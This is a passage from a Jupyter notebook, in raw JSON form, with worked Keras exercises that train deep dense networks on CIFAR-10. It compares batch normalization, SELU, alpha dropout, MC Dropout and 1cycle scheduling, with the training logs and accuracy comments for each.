I experimented with 1e-5, 3e-5, 5e-5, 1e-4, 3e-4, 5e-4, 1e-3 and 3e-3, and I chose the one with the best validation performance after 20 epochs.\n* I renamed the run directories to run_bn_* and the model file name to my_cifar10_bn_model.h5.", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nmodel.add(keras.layers.BatchNormalization())\nfor _ in range(20):\n model.add(keras.layers.Dense(100, kernel_initializer=\"he_normal\"))\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.Activation(\"elu\"))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.Nadam(learning_rate=5e-4)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_bn_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_logs\", \"run_bn_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]\n\nmodel.fit(X_train, y_train, epochs=100,\n validation_data=(X_valid, y_valid),\n callbacks=callbacks)\n\nmodel = keras.models.load_model(\"my_cifar10_bn_model.h5\")\nmodel.evaluate(X_valid, y_valid)", "Epoch 1/100\n1407/1407 [==============================] - 19s 9ms/step - loss: 1.9765 - accuracy: 0.2968 - val_loss: 1.6602 - val_accuracy: 0.4042\nEpoch 2/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.6787 - accuracy: 0.4056 - val_loss: 1.5887 - val_accuracy: 0.4304\nEpoch 3/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.6097 - accuracy: 0.4274 - val_loss: 1.5781 - val_accuracy: 
0.4326\nEpoch 4/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.5574 - accuracy: 0.4486 - val_loss: 1.5064 - val_accuracy: 0.4676\nEpoch 5/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.5075 - accuracy: 0.4642 - val_loss: 1.4412 - val_accuracy: 0.4844\nEpoch 6/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.4664 - accuracy: 0.4787 - val_loss: 1.4179 - val_accuracy: 0.4984\nEpoch 7/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.4334 - accuracy: 0.4932 - val_loss: 1.4277 - val_accuracy: 0.4906\nEpoch 8/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.4054 - accuracy: 0.5038 - val_loss: 1.3843 - val_accuracy: 0.5130\nEpoch 9/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.3816 - accuracy: 0.5106 - val_loss: 1.3691 - val_accuracy: 0.5108\nEpoch 10/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.3547 - accuracy: 0.5206 - val_loss: 1.3552 - val_accuracy: 0.5226\nEpoch 11/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 1.3244 - accuracy: 0.5371 - val_loss: 1.3678 - val_accuracy: 0.5142\nEpoch 12/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.3078 - accuracy: 0.5393 - val_loss: 1.3844 - val_accuracy: 0.5080\nEpoch 13/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 1.2889 - accuracy: 0.5431 - val_loss: 1.3566 - val_accuracy: 0.5164\nEpoch 14/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 1.2607 - accuracy: 0.5559 - val_loss: 1.3626 - val_accuracy: 0.5248\nEpoch 15/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.2580 - accuracy: 0.5587 - val_loss: 1.3616 - val_accuracy: 0.5276\nEpoch 16/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.2441 - accuracy: 0.5586 - val_loss: 1.3350 - val_accuracy: 0.5286\nEpoch 17/100\n1407/1407 [==============================] - 
12s 8ms/step - loss: 1.2241 - accuracy: 0.5676 - val_loss: 1.3370 - val_accuracy: 0.5408\nEpoch 18/100\n<<29 more lines>>\nEpoch 33/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.0336 - accuracy: 0.6369 - val_loss: 1.3682 - val_accuracy: 0.5450\nEpoch 34/100\n1407/1407 [==============================] - 11s 8ms/step - loss: 1.0228 - accuracy: 0.6388 - val_loss: 1.3348 - val_accuracy: 0.5458\nEpoch 35/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 1.0205 - accuracy: 0.6407 - val_loss: 1.3490 - val_accuracy: 0.5440\nEpoch 36/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 1.0008 - accuracy: 0.6489 - val_loss: 1.3568 - val_accuracy: 0.5408\nEpoch 37/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9785 - accuracy: 0.6543 - val_loss: 1.3628 - val_accuracy: 0.5396\nEpoch 38/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9832 - accuracy: 0.6592 - val_loss: 1.3617 - val_accuracy: 0.5482\nEpoch 39/100\n1407/1407 [==============================] - 12s 8ms/step - loss: 0.9707 - accuracy: 0.6581 - val_loss: 1.3767 - val_accuracy: 0.5446\nEpoch 40/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9590 - accuracy: 0.6651 - val_loss: 1.4200 - val_accuracy: 0.5314\nEpoch 41/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9548 - accuracy: 0.6668 - val_loss: 1.3692 - val_accuracy: 0.5450\nEpoch 42/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9480 - accuracy: 0.6667 - val_loss: 1.3841 - val_accuracy: 0.5310\nEpoch 43/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9411 - accuracy: 0.6716 - val_loss: 1.4036 - val_accuracy: 0.5382\nEpoch 44/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9383 - accuracy: 0.6708 - val_loss: 1.4114 - val_accuracy: 0.5236\nEpoch 45/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9258 - 
accuracy: 0.6769 - val_loss: 1.4224 - val_accuracy: 0.5324\nEpoch 46/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.9072 - accuracy: 0.6836 - val_loss: 1.3875 - val_accuracy: 0.5442\nEpoch 47/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.8996 - accuracy: 0.6850 - val_loss: 1.4449 - val_accuracy: 0.5280\nEpoch 48/100\n1407/1407 [==============================] - 13s 9ms/step - loss: 0.9050 - accuracy: 0.6835 - val_loss: 1.4167 - val_accuracy: 0.5338\nEpoch 49/100\n1407/1407 [==============================] - 12s 9ms/step - loss: 0.8934 - accuracy: 0.6880 - val_loss: 1.4260 - val_accuracy: 0.5294\n157/157 [==============================] - 1s 2ms/step - loss: 1.3344 - accuracy: 0.5398\n" ] ], [ [ "* *Is the model converging faster than before?* Much faster! The previous model took 27 epochs to reach the lowest validation loss, while the new model achieved that same loss in just 5 epochs and continued to make progress until the 16th epoch. The BN layers stabilized training and allowed us to use a much larger learning rate, so convergence was faster.\n* *Does BN produce a better model?* Yes! The final model is also much better, with 54.0% accuracy instead of 47.6%. It's still not a very good model, but at least it's much better than before (a Convolutional Neural Network would do much better, but that's a different topic, see chapter 14).\n* *How does BN affect training speed?* Although the model converged much faster, each epoch took about 12s instead of 8s, because of the extra computations required by the BN layers. 
But overall the training time (wall time) was shortened significantly!", "_____no_output_____" ], [ "### d.\n*Exercise: Try replacing Batch Normalization with SELU, and make the necessary adjustements to ensure the network self-normalizes (i.e., standardize the input features, use LeCun normal initialization, make sure the DNN contains only a sequence of dense layers, etc.).*", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.Nadam(learning_rate=7e-4)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_selu_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_logs\", \"run_selu_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]\n\nX_means = X_train.mean(axis=0)\nX_stds = X_train.std(axis=0)\nX_train_scaled = (X_train - X_means) / X_stds\nX_valid_scaled = (X_valid - X_means) / X_stds\nX_test_scaled = (X_test - X_means) / X_stds\n\nmodel.fit(X_train_scaled, y_train, epochs=100,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=callbacks)\n\nmodel = keras.models.load_model(\"my_cifar10_selu_model.h5\")\nmodel.evaluate(X_valid_scaled, y_valid)", "Epoch 1/100\n1407/1407 [==============================] - 10s 5ms/step - loss: 2.0622 - accuracy: 0.2631 - val_loss: 1.7878 - val_accuracy: 0.3552\nEpoch 2/100\n1407/1407 
[==============================] - 7s 5ms/step - loss: 1.7328 - accuracy: 0.3830 - val_loss: 1.7028 - val_accuracy: 0.3828\nEpoch 3/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.6342 - accuracy: 0.4279 - val_loss: 1.6692 - val_accuracy: 0.4022\nEpoch 4/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5524 - accuracy: 0.4538 - val_loss: 1.6350 - val_accuracy: 0.4300\nEpoch 5/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4979 - accuracy: 0.4756 - val_loss: 1.5773 - val_accuracy: 0.4356\nEpoch 6/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4428 - accuracy: 0.4902 - val_loss: 1.5529 - val_accuracy: 0.4630\nEpoch 7/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3966 - accuracy: 0.5126 - val_loss: 1.5290 - val_accuracy: 0.4682\nEpoch 8/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3549 - accuracy: 0.5232 - val_loss: 1.4633 - val_accuracy: 0.4792\nEpoch 9/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3162 - accuracy: 0.5444 - val_loss: 1.4787 - val_accuracy: 0.4776\nEpoch 10/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2825 - accuracy: 0.5534 - val_loss: 1.4794 - val_accuracy: 0.4934\nEpoch 11/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2529 - accuracy: 0.5682 - val_loss: 1.5529 - val_accuracy: 0.4982\nEpoch 12/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2256 - accuracy: 0.5784 - val_loss: 1.4942 - val_accuracy: 0.4902\nEpoch 13/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2049 - accuracy: 0.5823 - val_loss: 1.4868 - val_accuracy: 0.5024\nEpoch 14/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1627 - accuracy: 0.6012 - val_loss: 1.4839 - val_accuracy: 0.5082\nEpoch 15/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1543 - accuracy: 0.6034 - 
val_loss: 1.5097 - val_accuracy: 0.4968\nEpoch 16/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1200 - accuracy: 0.6135 - val_loss: 1.5001 - val_accuracy: 0.5120\nEpoch 17/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1028 - accuracy: 0.6199 - val_loss: 1.4856 - val_accuracy: 0.5056\nEpoch 18/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0863 - accuracy: 0.6265 - val_loss: 1.5116 - val_accuracy: 0.4966\nEpoch 19/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0715 - accuracy: 0.6345 - val_loss: 1.5787 - val_accuracy: 0.5070\nEpoch 20/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0342 - accuracy: 0.6453 - val_loss: 1.4987 - val_accuracy: 0.5144\nEpoch 21/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0169 - accuracy: 0.6531 - val_loss: 1.6292 - val_accuracy: 0.4462\nEpoch 22/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.1346 - accuracy: 0.6074 - val_loss: 1.5280 - val_accuracy: 0.5136\nEpoch 23/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9820 - accuracy: 0.6678 - val_loss: 1.5392 - val_accuracy: 0.5040\nEpoch 24/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9701 - accuracy: 0.6679 - val_loss: 1.5505 - val_accuracy: 0.5170\nEpoch 25/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3604 - accuracy: 0.6753 - val_loss: 1.5468 - val_accuracy: 0.4992\nEpoch 26/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0177 - accuracy: 0.6510 - val_loss: 1.5474 - val_accuracy: 0.5020\nEpoch 27/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9425 - accuracy: 0.6798 - val_loss: 1.5545 - val_accuracy: 0.5076\nEpoch 28/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9005 - accuracy: 0.6902 - val_loss: 1.5659 - val_accuracy: 0.5138\n157/157 
[==============================] - 0s 1ms/step - loss: 1.4633 - accuracy: 0.4792\n" ], [ "model = keras.models.load_model(\"my_cifar10_selu_model.h5\")\nmodel.evaluate(X_valid_scaled, y_valid)", "157/157 [==============================] - 0s 1ms/step - loss: 1.4633 - accuracy: 0.4792\n" ] ], [ [ "We get 47.9% accuracy, which is not much better than the original model (47.6%), and not as good as the model using batch normalization (54.0%). However, convergence was almost as fast as with the BN model, plus each epoch took only 7 seconds. So it's by far the fastest model to train so far.", "_____no_output_____" ], [ "### e.\n*Exercise: Try regularizing the model with alpha dropout. Then, without retraining your model, see if you can achieve better accuracy using MC Dropout.*", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\n\nmodel.add(keras.layers.AlphaDropout(rate=0.1))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.Nadam(learning_rate=5e-4)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\nearly_stopping_cb = keras.callbacks.EarlyStopping(patience=20)\nmodel_checkpoint_cb = keras.callbacks.ModelCheckpoint(\"my_cifar10_alpha_dropout_model.h5\", save_best_only=True)\nrun_index = 1 # increment every time you train the model\nrun_logdir = os.path.join(os.curdir, \"my_cifar10_logs\", \"run_alpha_dropout_{:03d}\".format(run_index))\ntensorboard_cb = keras.callbacks.TensorBoard(run_logdir)\ncallbacks = [early_stopping_cb, model_checkpoint_cb, tensorboard_cb]\n\nX_means = X_train.mean(axis=0)\nX_stds = X_train.std(axis=0)\nX_train_scaled = (X_train - X_means) / X_stds\nX_valid_scaled = (X_valid - 
X_means) / X_stds\nX_test_scaled = (X_test - X_means) / X_stds\n\nmodel.fit(X_train_scaled, y_train, epochs=100,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=callbacks)\n\nmodel = keras.models.load_model(\"my_cifar10_alpha_dropout_model.h5\")\nmodel.evaluate(X_valid_scaled, y_valid)", "Epoch 1/100\n1407/1407 [==============================] - 9s 5ms/step - loss: 2.0583 - accuracy: 0.2742 - val_loss: 1.7429 - val_accuracy: 0.3858\nEpoch 2/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.6852 - accuracy: 0.4008 - val_loss: 1.7055 - val_accuracy: 0.3792\nEpoch 3/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5963 - accuracy: 0.4413 - val_loss: 1.7401 - val_accuracy: 0.4072\nEpoch 4/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.5231 - accuracy: 0.4634 - val_loss: 1.5728 - val_accuracy: 0.4584\nEpoch 5/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.4619 - accuracy: 0.4887 - val_loss: 1.5448 - val_accuracy: 0.4702\nEpoch 6/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.4074 - accuracy: 0.5061 - val_loss: 1.5678 - val_accuracy: 0.4664\nEpoch 7/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.3718 - accuracy: 0.5222 - val_loss: 1.5764 - val_accuracy: 0.4824\nEpoch 8/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.3220 - accuracy: 0.5387 - val_loss: 1.4805 - val_accuracy: 0.4890\nEpoch 9/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.2908 - accuracy: 0.5487 - val_loss: 1.5521 - val_accuracy: 0.4638\nEpoch 10/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.2537 - accuracy: 0.5607 - val_loss: 1.5281 - val_accuracy: 0.4924\nEpoch 11/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.2215 - accuracy: 0.5782 - val_loss: 1.5147 - val_accuracy: 0.5046\nEpoch 12/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 
1.1910 - accuracy: 0.5831 - val_loss: 1.5248 - val_accuracy: 0.5002\nEpoch 13/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.1659 - accuracy: 0.5982 - val_loss: 1.5620 - val_accuracy: 0.5066\nEpoch 14/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.1282 - accuracy: 0.6120 - val_loss: 1.5440 - val_accuracy: 0.5180\nEpoch 15/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.1127 - accuracy: 0.6133 - val_loss: 1.5782 - val_accuracy: 0.5146\nEpoch 16/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0917 - accuracy: 0.6266 - val_loss: 1.6182 - val_accuracy: 0.5182\nEpoch 17/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 1.0620 - accuracy: 0.6331 - val_loss: 1.6285 - val_accuracy: 0.5126\nEpoch 18/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0433 - accuracy: 0.6413 - val_loss: 1.6299 - val_accuracy: 0.5158\nEpoch 19/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 1.0087 - accuracy: 0.6549 - val_loss: 1.7172 - val_accuracy: 0.5062\nEpoch 20/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 0.9950 - accuracy: 0.6571 - val_loss: 1.6524 - val_accuracy: 0.5098\nEpoch 21/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9848 - accuracy: 0.6652 - val_loss: 1.7686 - val_accuracy: 0.5038\nEpoch 22/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9597 - accuracy: 0.6744 - val_loss: 1.6177 - val_accuracy: 0.5084\nEpoch 23/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9399 - accuracy: 0.6790 - val_loss: 1.7095 - val_accuracy: 0.5082\nEpoch 24/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.9148 - accuracy: 0.6884 - val_loss: 1.7160 - val_accuracy: 0.5150\nEpoch 25/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 0.9023 - accuracy: 0.6949 - val_loss: 1.7017 - val_accuracy: 0.5152\nEpoch 
26/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.8732 - accuracy: 0.7031 - val_loss: 1.7274 - val_accuracy: 0.5088\nEpoch 27/100\n1407/1407 [==============================] - 6s 5ms/step - loss: 0.8542 - accuracy: 0.7091 - val_loss: 1.7648 - val_accuracy: 0.5166\nEpoch 28/100\n1407/1407 [==============================] - 7s 5ms/step - loss: 0.8499 - accuracy: 0.7118 - val_loss: 1.7973 - val_accuracy: 0.5000\n157/157 [==============================] - 0s 1ms/step - loss: 1.4805 - accuracy: 0.4890\n" ] ], [ [ "The model reaches 48.9% accuracy on the validation set. That's very slightly better than without dropout (47.6%). With an extensive hyperparameter search, it might be possible to do better (I tried dropout rates of 5%, 10%, 20% and 40%, and learning rates 1e-4, 3e-4, 5e-4, and 1e-3), but probably not much better in this case.", "_____no_output_____" ], [ "Let's use MC Dropout now. We will need the `MCAlphaDropout` class we used earlier, so let's just copy it here for convenience:", "_____no_output_____" ] ], [ [ "class MCAlphaDropout(keras.layers.AlphaDropout):\n def call(self, inputs):\n return super().call(inputs, training=True)", "_____no_output_____" ] ], [ [ "Now let's create a new model, identical to the one we just trained (with the same weights), but with `MCAlphaDropout` dropout layers instead of `AlphaDropout` layers:", "_____no_output_____" ] ], [ [ "mc_model = keras.models.Sequential([\n MCAlphaDropout(layer.rate) if isinstance(layer, keras.layers.AlphaDropout) else layer\n for layer in model.layers\n])", "_____no_output_____" ] ], [ [ "Then let's add a couple utility functions. The first will run the model many times (10 by default) and it will return the mean predicted class probabilities. 
The second will use these mean probabilities to predict the most likely class for each instance:", "_____no_output_____" ] ], [ [ "def mc_dropout_predict_probas(mc_model, X, n_samples=10):\n Y_probas = [mc_model.predict(X) for sample in range(n_samples)]\n return np.mean(Y_probas, axis=0)\n\ndef mc_dropout_predict_classes(mc_model, X, n_samples=10):\n Y_probas = mc_dropout_predict_probas(mc_model, X, n_samples)\n return np.argmax(Y_probas, axis=1)", "_____no_output_____" ] ], [ [ "Now let's make predictions for all the instances in the validation set, and compute the accuracy:", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\ny_pred = mc_dropout_predict_classes(mc_model, X_valid_scaled)\naccuracy = np.mean(y_pred == y_valid[:, 0])\naccuracy", "_____no_output_____" ] ], [ [ "We get no accuracy improvement in this case (we're still at 48.9% accuracy).\n\nSo the best model we got in this exercise is the Batch Normalization model.", "_____no_output_____" ], [ "### f.\n*Exercise: Retrain your model using 1cycle scheduling and see if it improves training speed and model accuracy.*", "_____no_output_____" ] ], [ [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\n\nmodel.add(keras.layers.AlphaDropout(rate=0.1))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.SGD(learning_rate=1e-3)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "batch_size = 128\nrates, losses = find_learning_rate(model, X_train_scaled, y_train, epochs=1, batch_size=batch_size)\nplot_lr_vs_loss(rates, losses)\nplt.axis([min(rates), max(rates), min(losses), (losses[0] + 
min(losses)) / 1.4])", "352/352 [==============================] - 2s 6ms/step - loss: nan - accuracy: 0.1255\n" ], [ "keras.backend.clear_session()\ntf.random.set_seed(42)\nnp.random.seed(42)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=[32, 32, 3]))\nfor _ in range(20):\n model.add(keras.layers.Dense(100,\n kernel_initializer=\"lecun_normal\",\n activation=\"selu\"))\n\nmodel.add(keras.layers.AlphaDropout(rate=0.1))\nmodel.add(keras.layers.Dense(10, activation=\"softmax\"))\n\noptimizer = keras.optimizers.SGD(learning_rate=1e-2)\nmodel.compile(loss=\"sparse_categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])", "_____no_output_____" ], [ "n_epochs = 15\nonecycle = OneCycleScheduler(math.ceil(len(X_train_scaled) / batch_size) * n_epochs, max_rate=0.05)\nhistory = model.fit(X_train_scaled, y_train, epochs=n_epochs, batch_size=batch_size,\n validation_data=(X_valid_scaled, y_valid),\n callbacks=[onecycle])", "Epoch 1/15\n352/352 [==============================] - 3s 6ms/step - loss: 2.2298 - accuracy: 0.2349 - val_loss: 1.7841 - val_accuracy: 0.3834\nEpoch 2/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.7928 - accuracy: 0.3689 - val_loss: 1.6806 - val_accuracy: 0.4086\nEpoch 3/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.6475 - accuracy: 0.4190 - val_loss: 1.6378 - val_accuracy: 0.4350\nEpoch 4/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.5428 - accuracy: 0.4543 - val_loss: 1.6266 - val_accuracy: 0.4390\nEpoch 5/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.4865 - accuracy: 0.4769 - val_loss: 1.6158 - val_accuracy: 0.4384\nEpoch 6/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.4339 - accuracy: 0.4866 - val_loss: 1.5850 - val_accuracy: 0.4412\nEpoch 7/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.4042 - accuracy: 0.5056 - val_loss: 1.6146 - val_accuracy: 0.4384\nEpoch 
8/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.3437 - accuracy: 0.5229 - val_loss: 1.5299 - val_accuracy: 0.4846\nEpoch 9/15\n352/352 [==============================] - 2s 5ms/step - loss: 1.2721 - accuracy: 0.5459 - val_loss: 1.5145 - val_accuracy: 0.4874\nEpoch 10/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.1942 - accuracy: 0.5698 - val_loss: 1.4958 - val_accuracy: 0.5040\nEpoch 11/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.1211 - accuracy: 0.6033 - val_loss: 1.5406 - val_accuracy: 0.4984\nEpoch 12/15\n352/352 [==============================] - 2s 6ms/step - loss: 1.0673 - accuracy: 0.6161 - val_loss: 1.5284 - val_accuracy: 0.5144\nEpoch 13/15\n352/352 [==============================] - 2s 6ms/step - loss: 0.9927 - accuracy: 0.6435 - val_loss: 1.5449 - val_accuracy: 0.5140\nEpoch 14/15\n352/352 [==============================] - 2s 6ms/step - loss: 0.9205 - accuracy: 0.6703 - val_loss: 1.5652 - val_accuracy: 0.5224\nEpoch 15/15\n352/352 [==============================] - 2s 6ms/step - loss: 0.8936 - accuracy: 0.6801 - val_loss: 1.5912 - val_accuracy: 0.5198\n" ] ], [ [ "One cycle allowed us to train the model in just 15 epochs, each taking only 2 seconds (thanks to the larger batch size). This is several times faster than the fastest model we trained so far. Moreover, we improved the model's performance (from 47.6% to 52.0%). The batch normalized model reaches a slightly better performance (54%), but it's much slower to train.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code", "code", "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ 